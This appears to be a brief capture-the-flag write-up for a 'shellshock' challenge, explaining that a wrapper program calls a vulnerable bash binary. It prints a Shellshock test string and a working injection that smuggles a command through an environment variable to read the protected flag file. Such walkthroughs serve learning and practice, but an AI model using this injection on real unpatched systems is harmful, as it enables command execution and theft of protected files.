This challenge has a bash executable in the home directory which the shellshock executable runs like below:
system("/home/shellshock/bash -c 'echo shock_me'");The bash binary is vulnerable to shellshock as can be seen by the following command:
env x='() { :;}; echo vulnerable' ./bash -c 'echo hello'Since the binary simply calls the bash binary, we can the command below to run the flag:
env x='() { :;}; /bin/cat flag' ./shellshock